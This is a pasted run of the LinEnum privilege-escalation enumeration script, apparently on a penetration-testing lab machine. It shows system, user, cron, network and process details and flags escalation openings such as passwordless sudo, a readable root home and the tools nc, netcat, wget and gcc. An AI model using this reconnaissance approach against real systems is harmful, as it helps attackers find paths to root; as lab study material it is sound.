LINENUM
a guest
Aug 8th, 2018
  1. bob@sufferance:/tmp$ bash linenum.sh
  2.  
  3. #########################################################
  4. # Local Linux Enumeration & Privilege Escalation Script #
  5. #########################################################
  6. # www.rebootuser.com
  7. # version 0.91
  8.  
  9. [-] Debug Info
  10. [+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)
  11.  
  12.  
  13. Scan started at:
  14. Wed Aug 8 03:55:57 EDT 2018
  15.  
  16.  
  17. ### SYSTEM ##############################################
  18. [-] Kernel information:
  19. Linux sufferance 2.6.30.5-ph33r #1 SMP Sat Aug 29 16:20:59 EDT 2009 i686 GNU/Linux
  20.  
  21.  
  22. [-] Kernel information (continued):
  23. Linux version 2.6.30.5-ph33r (root@sufference) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Sat Aug 29 16:20:59 EDT 2009
  24.  
  25.  
  26. [-] Hostname:
  27. sufferance
  28.  
  29.  
  30. ### USER/GROUP ##########################################
  31. [-] Current user/group info:
  32. uid=1001(bob) gid=1001(bob) groups=1001(bob)
  33.  
  34.  
  35. [-] Users that have previously logged onto the system:
  36. Username Port From Latest
  37. root tty1 Thu Jun 9 07:30:24 -0400 2016
  38. bob pts/1 10.11.0.86 Wed Aug 8 03:21:49 -0400 2018
  39.  
  40.  
  41. [-] Who else is logged on:
  42. 03:55:57 up 9:27, 2 users, load average: 0.00, 0.00, 0.00
  43. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  44. bob pts/0 10.11.0.86 03:14 37:01m 0.00s 0.00s -bash
  45. bob pts/1 10.11.0.86 03:21 2.00s 0.03s 0.02s bash linenum.sh
  46.  
  47.  
  48. [-] Group memberships:
  49. uid=0(root) gid=0(root) groups=0(root)
  50. uid=1(daemon) gid=1(daemon) groups=1(daemon)
  51. uid=2(bin) gid=2(bin) groups=2(bin)
  52. uid=3(sys) gid=3(sys) groups=3(sys)
  53. uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
  54. uid=5(games) gid=60(games) groups=60(games)
  55. uid=6(man) gid=12(man) groups=12(man)
  56. uid=7(lp) gid=7(lp) groups=7(lp)
  57. uid=8(mail) gid=8(mail) groups=8(mail)
  58. uid=9(news) gid=9(news) groups=9(news)
  59. uid=10(uucp) gid=10(uucp) groups=10(uucp)
  60. uid=13(proxy) gid=13(proxy) groups=13(proxy)
  61. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  62. uid=34(backup) gid=34(backup) groups=34(backup)
  63. uid=38(list) gid=38(list) groups=38(list)
  64. uid=39(irc) gid=39(irc) groups=39(irc)
  65. uid=41(gnats) gid=41(gnats) groups=41(gnats)
  66. uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
  67. uid=100(Debian-exim) gid=102(Debian-exim) groups=102(Debian-exim)
  68. uid=101(statd) gid=65534(nogroup) groups=65534(nogroup)
  69. uid=102(identd) gid=65534(nogroup) groups=65534(nogroup)
  70. uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
  71. uid=1001(bob) gid=1001(bob) groups=1001(bob)
  72.  
  73.  
  74. [-] Contents of /etc/passwd:
  75. root:x:0:0:root:/root:/bin/bash
  76. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  77. bin:x:2:2:bin:/bin:/bin/sh
  78. sys:x:3:3:sys:/dev:/bin/sh
  79. sync:x:4:65534:sync:/bin:/bin/sync
  80. games:x:5:60:games:/usr/games:/bin/sh
  81. man:x:6:12:man:/var/cache/man:/bin/sh
  82. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  83. mail:x:8:8:mail:/var/mail:/bin/sh
  84. news:x:9:9:news:/var/spool/news:/bin/sh
  85. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  86. proxy:x:13:13:proxy:/bin:/bin/sh
  87. www-data:x:33:33:www-data:/var/www:/bin/sh
  88. backup:x:34:34:backup:/var/backups:/bin/sh
  89. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  90. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  91. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  92. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  93. Debian-exim:x:100:102::/var/spool/exim4:/bin/false
  94. statd:x:101:65534::/var/lib/nfs:/bin/false
  95. identd:x:102:65534::/var/run/identd:/bin/false
  96. sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
  97. bob:x:1001:1001::/home/bob:/bin/bash
  98.  
  99.  
  100. [-] Super user account(s):
  101. root
  102.  
  103.  
  104. [+] We can sudo without supplying a password!
  105. usage: sudo [-HPSb] [-p prompt] [-u username|#uid]
  106. { -e file [...] | -i | -s | <command> }
  107.  
  108.  
  109. [+] We can read root's home directory!
  110. total 36K
  111. drwxr-xr-x 4 root root 4.0K 2016-06-09 07:29 .
  112. drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
  113. drwx------ 2 root root 4.0K 2007-09-05 19:55 .aptitude
  114. -rw------- 1 root root 35 2016-06-09 07:30 .bash_history
  115. -rw-r--r-- 1 root root 633 2016-04-19 03:53 .bashrc
  116. -rw-r--r-- 1 root root 110 2004-11-10 11:10 .profile
  117. ---------- 1 root root 33 2015-02-27 19:33 proof.txt
  118. drwx------ 2 root root 4.0K 2011-01-29 13:07 .ssh
  119. -rw------- 1 root root 1 2016-04-19 03:52 .viminfo
  120.  
  121.  
  122. [-] Are permissions on /home directories lax:
  123. total 12K
  124. drwxr-xr-x 3 root root 4.0K 2008-10-05 19:21 .
  125. drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
  126. drwxr-xr-x 4 bob 1000 4.0K 2011-01-29 13:07 bob
  127.  
  128.  
  129. [-] Root is allowed to login via SSH:
  130. PermitRootLogin yes
  131.  
  132.  
  133. ### ENVIRONMENTAL #######################################
  134. [-] Environment information:
  135. SHELL=/bin/bash
  136. TERM=xterm-256color
  137. SSH_CLIENT=10.11.0.86 44278 22
  138. SSH_TTY=/dev/pts/1
  139. USER=bob
  140. PATH=/usr/local/bin:/usr/bin:/bin:/usr/games
  141. MAIL=/var/mail/bob
  142. PWD=/tmp
  143. LANG=en_US.UTF-8
  144. HOME=/home/bob
  145. SHLVL=2
  146. LOGNAME=bob
  147. SSH_CONNECTION=10.11.0.86 44278 10.11.1.136 22
  148. _=/usr/bin/env
  149.  
  150.  
  151. [-] Path information:
  152. /usr/local/bin:/usr/bin:/bin:/usr/games
  153.  
  154.  
  155. [-] Available shells:
  156. # /etc/shells: valid login shells
  157. /bin/csh
  158. /bin/sh
  159. /usr/bin/es
  160. /usr/bin/ksh
  161. /bin/ksh
  162. /usr/bin/rc
  163. /usr/bin/tcsh
  164. /bin/tcsh
  165. /usr/bin/esh
  166. /bin/bash
  167. /bin/rbash
  168.  
  169.  
  170. [-] Current umask value:
  171. u=rwx,g=rx,o=rx
  172. 0022
  173.  
  174.  
  175. [-] Password and storage information:
  176. PASS_MAX_DAYS 99999
  177. PASS_MIN_DAYS 0
  178. PASS_WARN_AGE 7
  179.  
  180.  
  181. ### JOBS/TASKS ##########################################
  182. [-] Cron jobs:
  183. -rw-r--r-- 1 root root 724 2006-12-19 19:02 /etc/crontab
  184.  
  185. /etc/cron.d:
  186. total 12
  187. drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
  188. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  189. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  190.  
  191. /etc/cron.daily:
  192. total 56
  193. drwxr-xr-x 2 root root 4096 2008-10-07 16:41 .
  194. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  195. -rwxr-xr-x 1 root root 5041 2007-02-26 16:21 apt
  196. -rwxr-xr-x 1 root root 314 2007-03-14 10:11 aptitude
  197. -rwxr-xr-x 1 root root 502 2007-01-02 12:26 bsdmainutils
  198. -rwxr-xr-x 1 root root 3961 2007-01-20 04:46 exim4-base
  199. -rwxr-xr-x 1 root root 419 2006-08-06 04:12 find
  200. -rwxr-xr-x 1 root root 89 2006-04-08 18:16 logrotate
  201. -rwxr-xr-x 1 root root 946 2007-01-29 07:20 man-db
  202. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  203. -rwxr-xr-x 1 root root 383 2008-05-29 06:21 samba
  204. -rwxr-xr-x 1 root root 3283 2006-12-19 19:02 standard
  205. -rwxr-xr-x 1 root root 1307 2006-05-25 05:38 sysklogd
  206.  
  207. /etc/cron.hourly:
  208. total 12
  209. drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
  210. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  211. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  212.  
  213. /etc/cron.monthly:
  214. total 16
  215. drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
  216. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  217. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  218. -rwxr-xr-x 1 root root 129 2006-12-19 19:02 standard
  219.  
  220. /etc/cron.weekly:
  221. total 20
  222. drwxr-xr-x 2 root root 4096 2007-09-05 19:54 .
  223. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  224. -rwxr-xr-x 1 root root 520 2007-01-29 07:20 man-db
  225. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  226. -rwxr-xr-x 1 root root 1092 2006-05-25 05:38 sysklogd
  227.  
  228.  
  229. [-] Crontab contents:
  230. # /etc/crontab: system-wide crontab
  231. # Unlike any other crontab you don't have to run the `crontab'
  232. # command to install the new version when you edit this file
  233. # and files in /etc/cron.d. These files also have username fields,
  234. # that none of the other crontabs do.
  235.  
  236. SHELL=/bin/sh
  237. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  238.  
  239. # m h dom mon dow user command
  240. 17 * * * * root cd / && run-parts --report /etc/cron.hourly
  241. 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
  242. 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
  243. 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
  244. #
  245.  
  246.  
  247. ### NETWORKING ##########################################
  248. [-] Network and IP info:
  249. eth0 Link encap:Ethernet HWaddr 00:50:56:B8:8E:C5
  250. inet addr:10.11.1.136 Bcast:10.11.255.255 Mask:255.255.0.0
  251. inet6 addr: fe80::250:56ff:feb8:8ec5/64 Scope:Link
  252. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
  253. RX packets:81845 errors:2 dropped:4 overruns:0 frame:0
  254. TX packets:27849 errors:0 dropped:0 overruns:0 carrier:0
  255. collisions:0 txqueuelen:1000
  256. RX bytes:7177303 (6.8 MiB) TX bytes:4947482 (4.7 MiB)
  257. Interrupt:18 Base address:0x2000
  258.  
  259. lo Link encap:Local Loopback
  260. inet addr:127.0.0.1 Mask:255.0.0.0
  261. inet6 addr: ::1/128 Scope:Host
  262. UP LOOPBACK RUNNING MTU:16436 Metric:1
  263. RX packets:18 errors:0 dropped:0 overruns:0 frame:0
  264. TX packets:18 errors:0 dropped:0 overruns:0 carrier:0
  265. collisions:0 txqueuelen:0
  266. RX bytes:1572 (1.5 KiB) TX bytes:1572 (1.5 KiB)
  267.  
  268.  
  269. [-] Nameserver(s):
  270. nameserver 10.11.1.220
  271. nameserver 10.11.1.221
  272.  
  273.  
  274. [-] Listening TCP:
  275. Active Internet connections (servers and established)
  276. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  277. tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
  278. tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN -
  279. tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
  280. tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
  281. tcp 0 0 10.11.1.136:445 10.11.0.60:60674 ESTABLISHED-
  282. tcp6 0 0 :::22 :::* LISTEN -
  283. tcp6 0 2396 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44278 ESTABLISHED-
  284. tcp6 0 0 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44154 ESTABLISHED-
  285.  
  286.  
  287. [-] Listening UDP:
  288. Active Internet connections (servers and established)
  289. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  290. udp 0 0 10.11.1.136:137 0.0.0.0:* -
  291. udp 0 0 0.0.0.0:137 0.0.0.0:* -
  292. udp 0 0 10.11.1.136:138 0.0.0.0:* -
  293. udp 0 0 0.0.0.0:138 0.0.0.0:* -
  294.  
  295.  
  296. ### SERVICES #############################################
  297. [-] Running processes:
  298. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  299. root 1 0.0 0.0 1940 640 ? Ss Aug07 0:01 init [2]
  300. root 2 0.0 0.0 0 0 ? S< Aug07 0:00 [kthreadd]
  301. root 3 0.0 0.0 0 0 ? S< Aug07 0:00 [migration/0]
  302. root 4 0.0 0.0 0 0 ? S< Aug07 0:00 [ksoftirqd/0]
  303. root 5 0.0 0.0 0 0 ? S< Aug07 0:00 [watchdog/0]
  304. root 6 0.0 0.0 0 0 ? S< Aug07 0:00 [events/0]
  305. root 7 0.0 0.0 0 0 ? S< Aug07 0:00 [cpuset]
  306. root 8 0.0 0.0 0 0 ? S< Aug07 0:00 [khelper]
  307. root 13 0.0 0.0 0 0 ? S< Aug07 0:00 [async/mgr]
  308. root 60 0.0 0.0 0 0 ? S< Aug07 0:00 [kblockd/0]
  309. root 62 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpid]
  310. root 63 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpi_notify]
  311. root 174 0.0 0.0 0 0 ? S< Aug07 0:00 [kseriod]
  312. root 224 0.0 0.0 0 0 ? S Aug07 0:00 [khungtaskd]
  313. root 225 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
  314. root 226 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
  315. root 227 0.0 0.0 0 0 ? S< Aug07 0:00 [kswapd0]
  316. root 228 0.0 0.0 0 0 ? S< Aug07 0:00 [aio/0]
  317. root 229 0.0 0.0 0 0 ? S< Aug07 0:00 [crypto/0]
  318. bob 705 0.2 0.3 19220 3176 ? S Aug07 1:17 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
  319. bob 736 0.0 0.3 19220 3176 ? S Aug07 0:27 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
  320. root 787 0.0 0.0 0 0 ? S< Aug07 0:00 [ata/0]
  321. root 809 0.0 0.0 0 0 ? S< Aug07 0:00 [ata_aux]
  322. root 810 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_0]
  323. root 811 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_1]
  324. root 954 0.0 0.0 0 0 ? S< Aug07 0:00 [mpt_poll_0]
  325. root 970 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_2]
  326. root 1183 0.0 0.2 7668 2224 ? Ss 03:14 0:00 sshd: bob [priv]
  327. bob 1185 0.0 0.1 7668 1560 ? S 03:14 0:00 sshd: bob@pts/0
  328. bob 1186 0.0 0.1 4484 1972 pts/0 Ss+ 03:14 0:00 -bash
  329. root 1194 0.0 0.2 9340 2936 ? S 03:18 0:00 /usr/sbin/smbd -D
  330. root 1201 0.0 0.0 0 0 ? S< Aug07 0:00 [kjournald]
  331. root 1482 0.0 0.0 0 0 ? S< Aug07 0:00 [kstriped]
  332. root 1485 0.0 0.0 0 0 ? S< Aug07 0:00 [ksnapd]
  333. root 1650 0.0 0.3 33948 3888 ? Sl Aug07 0:22 /usr/sbin/vmtoolsd
  334. root 1864 0.0 0.0 1620 616 ? Ss Aug07 0:00 /sbin/syslogd
  335. root 1870 0.0 0.0 1572 372 ? Ss Aug07 0:00 /sbin/klogd -x
  336. root 1923 0.0 0.2 7668 2220 ? Ss 03:21 0:00 sshd: bob [priv]
  337. root 1924 0.0 0.0 1568 560 ? Ss Aug07 0:00 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket
  338. bob 1926 0.0 0.1 7828 1568 ? S 03:21 0:00 sshd: bob@pts/1
  339. bob 1927 0.0 0.1 4476 1924 pts/1 Ss 03:21 0:00 -bash
  340. 100 1967 0.0 0.0 5308 996 ? Ss Aug07 0:00 /usr/sbin/exim4 -bd -q30m
  341. root 1981 0.0 0.0 1744 568 ? Ss Aug07 0:00 /usr/sbin/inetd
  342. root 1988 0.0 0.1 5884 1388 ? Ss Aug07 0:01 /usr/sbin/nmbd -D
  343. root 1990 0.0 0.2 9052 2532 ? Ss Aug07 0:00 /usr/sbin/smbd -D
  344. root 1999 0.0 0.1 9052 1092 ? S Aug07 0:00 /usr/sbin/smbd -D
  345. root 2003 0.0 0.1 4920 1088 ? Ss Aug07 0:00 /usr/sbin/sshd
  346. root 2030 0.0 0.0 0 0 ? S< Aug07 0:00 [rpciod/0]
  347. root 2031 0.0 0.0 0 0 ? S< Aug07 0:00 [nfsiod]
  348. root 2037 0.0 0.0 3504 516 ? Ss Aug07 0:00 /usr/sbin/rpc.idmapd
  349. daemon 2047 0.0 0.0 1824 408 ? Ss Aug07 0:00 /usr/sbin/atd
  350. root 2054 0.0 0.0 2188 760 ? Ss Aug07 0:00 /usr/sbin/cron
  351. root 2087 0.0 0.0 1568 492 tty1 Ss+ Aug07 0:00 /sbin/getty 38400 tty1
  352. root 2088 0.0 0.0 1568 492 tty2 Ss+ Aug07 0:00 /sbin/getty 38400 tty2
  353. root 2089 0.0 0.0 1568 488 tty3 Ss+ Aug07 0:00 /sbin/getty 38400 tty3
  354. root 2090 0.0 0.0 1568 492 tty4 Ss+ Aug07 0:00 /sbin/getty 38400 tty4
  355. root 2091 0.0 0.0 1568 488 tty5 Ss+ Aug07 0:00 /sbin/getty 38400 tty5
  356. root 2092 0.0 0.0 1568 488 tty6 Ss+ Aug07 0:00 /sbin/getty 38400 tty6
  357. bob 2104 1.0 0.1 4568 1872 pts/1 S+ 03:55 0:00 bash linenum.sh
  358. bob 2105 1.0 0.1 4584 1508 pts/1 R+ 03:55 0:00 bash linenum.sh
  359. bob 2107 0.0 0.0 2744 504 pts/1 S+ 03:55 0:00 tee -a
  360. bob 2286 0.0 0.1 4584 1272 pts/1 R+ 03:55 0:00 bash linenum.sh
  361. bob 2287 0.0 0.0 3424 984 pts/1 R+ 03:55 0:00 ps aux
  362.  
  363.  
  364. [-] Process binaries and associated permissions (from above list):
  365. 16K -rwxr-xr-x 1 root root 15K 2007-02-21 12:48 /sbin/getty
  366. 24K -rwxr-xr-x 1 root root 23K 2006-05-25 05:38 /sbin/klogd
  367. 28K -rwxr-xr-x 1 root root 28K 2006-05-25 05:38 /sbin/syslogd
  368. 696K -rwxr-xr-x 2 root root 689K 2015-02-27 19:06 /usr/lib/vmware-tools/sbin32/vmtoolsd
  369. 20K -rwxr-xr-x 1 root root 18K 2006-01-15 16:24 /usr/sbin/acpid
  370. 16K -rwxr-xr-x 1 root root 16K 2006-01-03 02:15 /usr/sbin/atd
  371. 32K -rwxr-xr-x 1 root root 31K 2006-12-19 19:02 /usr/sbin/cron
  372. 676K -rwsr-xr-x 1 root root 672K 2007-01-20 04:46 /usr/sbin/exim4
  373. 32K -rwxr-xr-x 1 root root 29K 2007-03-21 14:12 /usr/sbin/inetd
  374. 900K -rwxr-xr-x 1 root root 893K 2008-05-29 06:21 /usr/sbin/nmbd
  375. 36K -rwxr-xr-x 1 root root 35K 2007-05-16 06:41 /usr/sbin/rpc.idmapd
  376. 3.1M -rwxr-xr-x 1 root root 3.1M 2008-05-29 06:21 /usr/sbin/smbd
  377. 316K -rwxr-xr-x 1 root root 312K 2007-03-05 11:38 /usr/sbin/sshd
  378. 0 lrwxrwxrwx 1 root root 37 2015-02-27 19:06 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
  379.  
  380.  
  381. [-] Contents of /etc/inetd.conf:
  382. # /etc/inetd.conf: see inetd(8) for further informations.
  383. #
  384. # Internet superserver configuration database
  385. #
  386. #
  387. # Lines starting with "#:LABEL:" or "#<off>#" should not
  388. # be changed unless you know what you are doing!
  389. #
  390. # If you want to disable an entry so it isn't touched during
  391. # package updates just comment it out with a single '#' character.
  392. #
  393. # Packages should modify this file by using update-inetd(8)
  394. #
  395. # <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
  396. #
  397. #:INTERNAL: Internal services
  398. #discard stream tcp nowait root internal
  399. #discard dgram udp wait root internal
  400. #daytime stream tcp nowait root internal
  401. #time stream tcp nowait root internal
  402.  
  403. #:STANDARD: These are standard services.
  404.  
  405. #:BSD: Shell, login, exec and talk are BSD protocols.
  406.  
  407. #:MAIL: Mail, news and uucp services.
  408.  
  409. #:INFO: Info services
  410. ident stream tcp wait identd /usr/sbin/identd identd
  411.  
  412. #:BOOT: TFTP service is provided primarily for booting. Most sites
  413. # run this only on machines acting as "boot servers."
  414.  
  415. #:RPC: RPC based services
  416.  
  417. #:HAM-RADIO: amateur-radio services
  418.  
  419. #:OTHER: Other services
  420. #<off># netbios-ssn stream tcp nowait root /usr/sbin/tcpd /usr/sbin/smbd
  421.  
  422.  
  423. [-] The related inetd binary permissions:
  424. -rwxr-xr-x 1 root root 4280 2007-02-25 15:06 /usr/sbin/tcpd
  425.  
  426.  
  427. [-] /etc/init.d/ binary permissions:
  428. total 332
  429. drwxr-xr-x 2 root root 4096 2015-02-27 19:06 .
  430. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  431. -rwxr-xr-x 1 root root 1850 2006-01-14 06:12 acpid
  432. -rwxr-xr-x 1 root root 969 2006-01-03 02:15 atd
  433. -rwxr-xr-x 1 root root 5089 2006-09-20 07:33 bootclean
  434. -rwxr-xr-x 1 root root 2146 2006-09-12 17:30 bootlogd
  435. -rwxr-xr-x 1 root root 1915 2006-09-20 07:27 bootmisc.sh
  436. -rwxr-xr-x 1 root root 2930 2006-09-14 04:20 checkfs.sh
  437. -rwxr-xr-x 1 root root 9548 2006-09-23 03:34 checkroot.sh
  438. -rwxr-xr-x 1 root root 6110 2006-09-05 12:15 console-screen.sh
  439. -rwxr-xr-x 1 root root 1761 2006-10-12 14:55 cron
  440. -rwxr-xr-x 1 root root 7104 2007-01-18 12:45 exim4
  441. -rwxr-xr-x 1 root root 5823 2007-07-30 16:39 glibc.sh
  442. -rwxr-xr-x 1 root root 1360 2007-01-13 13:52 halt
  443. -rwxr-xr-x 1 root root 1287 2006-09-12 17:31 hostname.sh
  444. -rwxr-xr-x 1 root root 3886 2007-02-21 12:48 hwclock.sh
  445. -rwxr-xr-x 1 root root 2518 2006-09-15 14:03 ifupdown
  446. -rwxr-xr-x 1 root root 1046 2006-09-15 14:03 ifupdown-clean
  447. -rwxr-xr-x 1 root root 3484 2006-10-15 23:38 keymap.sh
  448. -rwxr-xr-x 1 root root 944 2006-09-12 17:31 killprocs
  449. -rwxr-xr-x 1 root root 1375 2006-05-25 05:38 klogd
  450. -rwxr-xr-x 1 root root 417 2006-08-08 18:38 libdevmapper1.02
  451. -rwxr-xr-x 1 root root 1054 2006-09-06 17:43 makedev
  452. -rwxr-xr-x 1 root root 1793 2006-11-14 06:12 module-init-tools
  453. -rwxr-xr-x 1 root root 617 2006-01-15 06:04 mountall-bootclean.sh
  454. -rwxr-xr-x 1 root root 1718 2006-09-12 17:30 mountall.sh
  455. -rwxr-xr-x 1 root root 2206 2006-10-03 14:22 mountdevsubfs.sh
  456. -rwxr-xr-x 1 root root 2394 2006-09-25 04:36 mountkernfs.sh
  457. -rwxr-xr-x 1 root root 615 2006-01-15 06:04 mountnfs-bootclean.sh
  458. -rwxr-xr-x 1 root root 2299 2006-11-26 08:35 mountnfs.sh
  459. -rwxr-xr-x 1 root root 3668 2006-11-26 10:13 mtab.sh
  460. -rwxr-xr-x 1 root root 1898 2007-01-16 04:06 nbd-server
  461. -rwxr-xr-x 1 root root 2550 2007-01-06 10:36 networking
  462. -rwxr-xr-x 1 root root 6644 2007-05-16 06:41 nfs-common
  463. -rwxr-xr-x 1 root root 4340 2007-05-16 06:41 nfs-kernel-server
  464. -rwxr-xr-x 1 root root 1241 2006-10-09 08:29 nfs-user-server
  465. -rwxr-xr-x 1 root root 2324 2007-02-25 15:29 openbsd-inetd
  466. -rwxr-xr-x 1 root root 1525 2006-12-22 03:15 portmap
  467. -rwxr-xr-x 1 root root 997 2006-09-12 21:42 procps.sh
  468. -rwxr-xr-x 1 root root 8045 2006-11-27 17:23 rc
  469. -rwxr-xr-x 1 root root 798 2006-09-28 13:25 rc.local
  470. -rwxr-xr-x 1 root root 480 2012-01-22 07:06 rc.py
  471. -rwxr-xr-x 1 root root 117 2005-12-02 12:44 rcS
  472. -rw-r--r-- 1 root root 1386 2006-09-13 02:10 README
  473. -rwxr-xr-x 1 root root 655 2006-09-22 10:21 reboot
  474. -rwxr-xr-x 1 root root 994 2006-09-12 17:30 rmnologin
  475. -rwxr-xr-x 1 root root 2153 2008-05-29 06:10 samba
  476. -rwxr-xr-x 1 root root 1376 2006-11-27 17:23 sendsigs
  477. -rwxr-xr-x 1 root root 585 2006-09-12 17:32 single
  478. -rw-r--r-- 1 root root 4187 2006-09-12 17:32 skeleton
  479. -rwxr-xr-x 1 root root 1891 2007-03-05 11:38 ssh
  480. -rwxr-xr-x 1 root root 520 2006-09-12 17:26 stop-bootlogd
  481. -rwxr-xr-x 1 root root 730 2006-10-02 13:14 stop-bootlogd-single
  482. -rwxr-xr-x 1 root root 541 2006-04-06 15:58 sudo
  483. -rwxr-xr-x 1 root root 2037 2006-05-25 05:38 sysklogd
  484. -rw-r--r-- 1 root root 8178 2006-12-19 05:21 udev
  485. -rw-r--r-- 1 root root 1252 2006-03-28 02:44 udev-mtab
  486. -rwxr-xr-x 1 root root 3175 2006-11-25 04:22 umountfs
  487. -rwxr-xr-x 1 root root 2128 2006-11-26 13:23 umountnfs.sh
  488. -rwxr-xr-x 1 root root 1122 2006-09-30 10:37 umountroot
  489. -rwxr-xr-x 1 root root 1815 2006-09-12 17:30 urandom
  490. -rwxr-xr-x 1 root root 41912 2015-02-27 19:06 vmware-tools
  491.  
  492.  
  493. ### SOFTWARE #############################################
  494. [-] Sudo version:
  495. Sudo version 1.6.8p12
  496.  
  497.  
  498. ### INTERESTING FILES ####################################
  499. [-] Useful file locations:
  500. /bin/nc
  501. /bin/netcat
  502. /usr/bin/wget
  503. /usr/bin/gcc
  504.  
  505.  
  506. [-] Installed compilers:
  507. ii gcc 4.1.1-15 The GNU C compiler
  508. ii gcc-4.1 4.1.1-21 The GNU C compiler
  509.  
  510.  
  511. [-] Can we read/write sensitive files:
  512. -rw-r--r-- 1 root root 945 2008-10-07 16:34 /etc/passwd
  513. -rw-r--r-- 1 root root 503 2008-10-05 19:21 /etc/group
  514. -rw-r--r-- 1 root root 475 2006-10-28 09:42 /etc/profile
  515. -rw-r----- 1 root shadow 680 2016-06-09 07:29 /etc/shadow
  516.  
  517.  
  518. [-] NFS config details:
  519. -rw-r--r-- 1 root root 1 2008-10-11 14:30 /etc/exports
  520.  
  521.  
  522. [-] Can't search *.conf files as no keyword was entered
  523.  
  524. [-] Can't search *.php files as no keyword was entered
  525.  
  526. [-] Can't search *.log files as no keyword was entered
  527.  
  528. [-] Can't search *.ini files as no keyword was entered
  529.  
  530. [-] All *.conf files in /etc (recursive 1 level):
  531. -rw-r--r-- 1 root root 1183 2008-10-07 16:41 /etc/inetd.conf
  532. -rw-r--r-- 1 root root 624 2006-07-07 22:43 /etc/mtools.conf
  533. -rw-r--r-- 1 root root 240 2007-09-05 20:01 /etc/kernel-img.conf
  534. -rw-r--r-- 1 root root 899 2006-10-29 10:27 /etc/gssapi_mech.conf
  535. -rw-r--r-- 1 root root 599 2005-09-03 08:49 /etc/logrotate.conf
  536. -rw-r--r-- 1 root root 2555 2004-12-06 08:59 /etc/reportbug.conf
  537. -rw-r--r-- 1 root root 1260 2007-02-25 14:30 /etc/ucf.conf
  538. -rw-r--r-- 1 root root 149 2007-09-05 20:29 /etc/modules.conf
  539. -rw-r--r-- 1 root root 9 2006-08-07 13:14 /etc/host.conf
  540. -rw-r--r-- 1 root root 330 2007-03-06 21:17 /etc/mke2fs.conf
  541. -rw-r--r-- 1 root root 475 2006-08-28 12:33 /etc/nsswitch.conf
  542. -rw-r--r-- 1 root root 145 2007-09-05 20:00 /etc/idmapd.conf
  543. -rw-r--r-- 1 root root 552 2004-07-31 16:34 /etc/pam.conf
  544. -rw-r--r-- 1 root root 2673 2006-12-20 14:31 /etc/debconf.conf
  545. -rw-r--r-- 1 root root 600 2007-01-19 02:25 /etc/deluser.conf
  546. -rw-r--r-- 1 root root 33 2007-09-05 19:45 /etc/ld.so.conf
  547. -rw-r--r-- 1 root root 2803 2007-09-05 19:48 /etc/adduser.conf
  548. -rw-r--r-- 1 root root 777 2006-09-12 21:53 /etc/sysctl.conf
  549. -rw-r--r-- 1 root root 1749 2006-06-21 02:43 /etc/identd.conf
  550. -rw-r--r-- 1 root root 216 2007-03-07 17:56 /etc/sestatus.conf
  551. -rw-r--r-- 1 root root 1664 2006-05-25 05:38 /etc/syslog.conf
  552. -rw-r--r-- 1 root root 807 2011-09-29 22:24 /etc/updatedb.conf
  553. -rw-r--r-- 1 root root 46 2016-04-19 03:53 /etc/resolv.conf
  554.  
  555.  
  556. [-] Current user's history files:
  557. -rw------- 1 bob bob 4367 2018-08-07 21:36 /home/bob/.bash_history
  558.  
  559.  
